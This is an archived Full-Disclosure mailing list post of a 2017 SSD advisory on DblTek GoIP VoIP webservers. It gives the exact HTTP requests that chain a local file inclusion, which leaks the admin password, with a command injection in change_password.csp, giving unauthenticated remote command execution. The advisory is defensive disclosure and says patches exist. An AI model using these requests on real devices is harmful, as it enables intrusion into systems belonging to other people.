lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 21 Nov 2017 14:44:59 +0200
From: Maor Shwartz <maors@...ondsecurity.com>
To: fulldisclosure@...lists.org
Cc: SecuriTeam Secure Disclosure <ssd@...ondsecurity.com>
Subject: [FD] SSD Advisory – DblTek Multiple Vulnerabilities

SSD Advisory – DblTek Multiple Vulnerabilities

Full report: https://blogs.securiteam.com/index.php/archives/3437
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

Vulnerabilities summary
The following advisory describes 2 (two) vulnerabilities found in DblTek
webserver.

DBL is “specialized in VoIP products, especially GoIPs. We design, develop,
manufacture, and sell our products directly and via distributors to
customers. Our GoIP models now cover 1, 4, 8, 16, and 32-channel in order
to meet the wide range of market demands. All our products are priced very
attractively and probably the lowest in the market. Because of the price
and performance, GoIPs have been widely adopted by system integrators, VoIP
service providers, and many other business and individual users.”

The vulnerabilities found are:

Pre-authentication Information Disclosure
Command Execution

It is possible to combine the 2 vulnerabilities and gain unauthenticated
remote command execution.

Credit
An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
DblTek has released patches to address those vulnerabilities.

Vulnerabilities details
User controlled input is not sufficiently sanitized and can trigger Local
File Inclusion.

By sending GET request to /dev/mtdblock/5 an attacker can download the
configuration file that contain admin password:


===

GET /default/en_US/frame.html?content=/dev/mtdblock/5

===

After we got the admin password, we can send a POST request to
change_password.csp and trigget the second vulnerability.

User controlled input is not sufficiently sanitized when pass to
change_password.csp. An attacker can inject script containing malicious
commands in a configuration variable and execute it.

===

POST /default/en_US/change_password.csp

Content-Type: application/x-www-form-urlencoded

Authorization: Basic ###BASE64("admin", ###LEAKED_PASSWORD###)###

level=user&user_level_enable=on&passwd=<%%25call system.exec:
###MALICIOUS_COMMAND###>

===


--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 6D273779F52A9FC2

Download attachment "SSD Advisory – DblTek Multiple Vulnerabilities – SecuriTeam Blogs.pdf" of type "application/pdf" (168999 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists